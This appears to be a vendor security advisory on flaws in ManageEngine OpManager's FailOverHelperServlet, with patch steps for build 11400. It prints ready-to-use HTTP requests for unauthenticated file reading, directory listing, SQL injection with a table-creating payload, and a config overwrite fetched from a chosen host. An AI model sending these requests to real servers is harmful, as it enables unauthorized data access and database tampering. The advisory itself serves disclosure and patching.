Vulnerabilities in FailOverHelperServlet

Vulnerabilities in FailOverHelperServlet


Vulnerabilities in FailoverHelperServlet. 
>> Technical details: 
The affected servlet is the "FailOverHelperServlet" or if you prefer 
FailServlet. 
 It is possible to hijack the failover operation completely. 


#1 
Vulnerability: Local file include 
Constraints: unauthenticated in all products 
Affected versions: ManageEngine Applications Manager v? to v11.Y 
bXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX 

POST /servlet/FailOverHelperServlet?operation=copyfile&fileName=C:\\boot.ini 


#2 
Vulnerability: Information disclosure - list all files in a directory 
and its children 
Constraints: unauthenticated in all products 
Affected versions: ManageEngine Applications Manager v? to v11.Y 
bXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX 

POST /servlet/FailOverHelperServlet?operation=listdirectory&rootDirectory=C:\\ 


#3 
Vulnerability: Blind SQL injection 
Affected versions: ManageEngine OpManager v8 - v11.Y bXXXXX 
Constraints: unauthenticated in OpManager and Applications Manager; 
authenticated in IT360 
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=[SQLi_1]&serverRole=[SQLi_2] 
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=a')%3b+create+table+bacas+(bodas+text)%3b--+&serverRole=a 


#4 
Vulnerability: Database configuration file overwrite 
Affected versions: ManageEngine OpManager v8 - v11.Y bXXXXX 
Constraints: unauthenticated in OpManager and Applications Manager; 
authenticated in IT360 

This will cause the server to make a request to 
http://192.168.56.101/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServletcopy?operation=copyfile&fileName=bla
in exactly the same as vulnerability #1. The file will then overwrite 
./conf/database_params.conf 

POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=requestToConfBackup&serverhost=192.168.56.101&serverport=80&webprotocol=http&fileName=bla 


#5 
Vulnerability: License configuration file overwrite 
Affected versions: ManageEngine OpManager v8 - v11.Y bXXXXX 


Note that you can only overwrite the license file with another valid 
license and do not control the path. So it's a very very low risk 
vulnerability (if it can be called that). 

POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=licensefile 
 

We have patch for these vulnerabilities for build 11400. 

Steps to apply the patch. 

1. Stop the OpManager Service.
2. Take the backUp of <OpManager home>\WEB-INF\classes\com\adventnet\me\opmanager\servlet folder.
3. Extract the attached zip under <OpManager home>

      It will extract the patch under WEB-INF\classes\com\adventnet\me\opmanager\servlet folder.

4)Stop and Start Opmanager.

          • Related Articles

          • Vulnerabilities in OpManager 12.0

            VULNERABILITY DETAILS(found in build 12000) Vulnerability 1: Unrestricted File Upload:  OpManager fails to validate or improperly validates files before uploading to the system. As a result an attacker might be able to upload arbitrary JSP file and ...
          • Servlet Vulnerability Fix

            This fix is compatible only for build 11300(OpManager and Social IT Plus).  Please follow these steps. 1)Download the attached zip file and extract it under /OpManager 2)Stop and Start OpManager Note: This zip file contains the fix for these ...